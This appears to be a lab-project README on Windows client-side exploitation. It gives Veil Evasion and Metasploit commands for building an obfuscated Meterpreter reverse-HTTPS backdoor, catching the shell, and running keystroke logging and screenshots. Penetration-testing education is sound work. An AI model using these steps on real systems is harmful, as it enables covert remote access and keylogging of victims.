This project simulates a client-side Windows exploitation scenario using a custom backdoor payload generated via the Veil Framework. It demonstrates how an attacker can deliver a payload to a victim using social engineering, gain unauthorized remote access using Metasploit, and perform post-exploitation activities — all within a controlled, ethical lab environment.
- Simulate real-world client-side exploitation using ethical hacking tools.
- Demonstrate backdoor creation using Veil Framework.
- Deliver a reverse shell payload and gain access to a target Windows machine.
- Understand and visualize the attacker's perspective to improve defensive strategies.
| Tool/Technology | Purpose |
|---|---|
| Kali Linux | Attacker OS environment |
| Veil Framework | Generate obfuscated backdoor payload |
| Metasploit | Set up reverse shell listener (msfconsole) |
| Meterpreter | Remote shell payload |
| Windows 10 VM | Victim OS in virtual environment |
| VirtualBox/VMware | Virtual lab setup |
- Attacker Machine: Kali Linux (with Veil and Metasploit installed)
- Target Machine: Windows (virtual machine in same isolated network)
- Network: Host-only or internal network in virtualization software
- In the attacker VM, install Veil Framework from its official source.
- Veil is used here as a learning tool to demonstrate payload obfuscation/evasion within a lab.
- Launch Veil and choose the Evasion module.
- The Evasion module enables generation of obfuscated payload artifacts for lab testing.
- Inside Evasion, select Meterpreter as the conceptual payload type.
- Meterpreter represents an interactive post-exploitation session used for educational demonstrations.
> list payloads # 15. go/meterpreter/rev-https.py
> use 15- Configure the payload metadata for the lab session:
- LHOST — IP address of the attacker VM on the isolated lab network.
- LPORT — listening port for incoming connections.
- Ensure these parameters are documented and matched in the listener configuration.
> Set LHOST "ip-address"
> Set LPORT 8080
> Set PROCESSORS 1
> Set SLEEP 6- Generate the payload artifact within the attacker VM and save it securely for lab delivery.
- Important: Do not publish or upload the generated executable to public repositories.
> options
> generate # it generates the backdoor payload
> rev_https_8080- Transfer the artifact to the target VM using a simulated delivery method appropriate for lab testing (mock email, USB in VM, or file share).
- This must only be done inside the isolated lab with explicit permission.
- On the attacker VM, launch the Metasploit interface conceptually (e.g.,
msfconsole). - Configure a multi-handler (listener) that matches the payload type, LHOST, and LPORT used during generation.
- Start the listener to await incoming connections from the target VM.
> msfconsole
> use exploit/multi/handler
> show options
> Set PAYLOAD windows/meterpreter/reverse_https
> Set LHOST "ip-address"
> Set LPORT 8080
> exploit- When the target executes the artifact inside the lab, it initiates a reverse connection to the attacker VM.
- A Meterpreter session (or equivalent) becomes available for interactive analysis.
- Perform only non-destructive enumeration for learning:
- View basic system information (OS, hostname, IP).
- List running processes.
- Enumerate users and privilege levels.
- Avoid any actions that would cause harm, persist beyond the lab, or exfiltrate sensitive data.
meterpreter > sysinfo
> help
> keyscan_start # captures the keys typed in the target machine
> keyscan_dump # it displays the keys captured by the keyscan_start
> keyscan_stop
> screenshotPerforming these steps outside an authorized lab is illegal and unethical. Ensure written authorization and follow institutional rules of engagement before conducting any testing.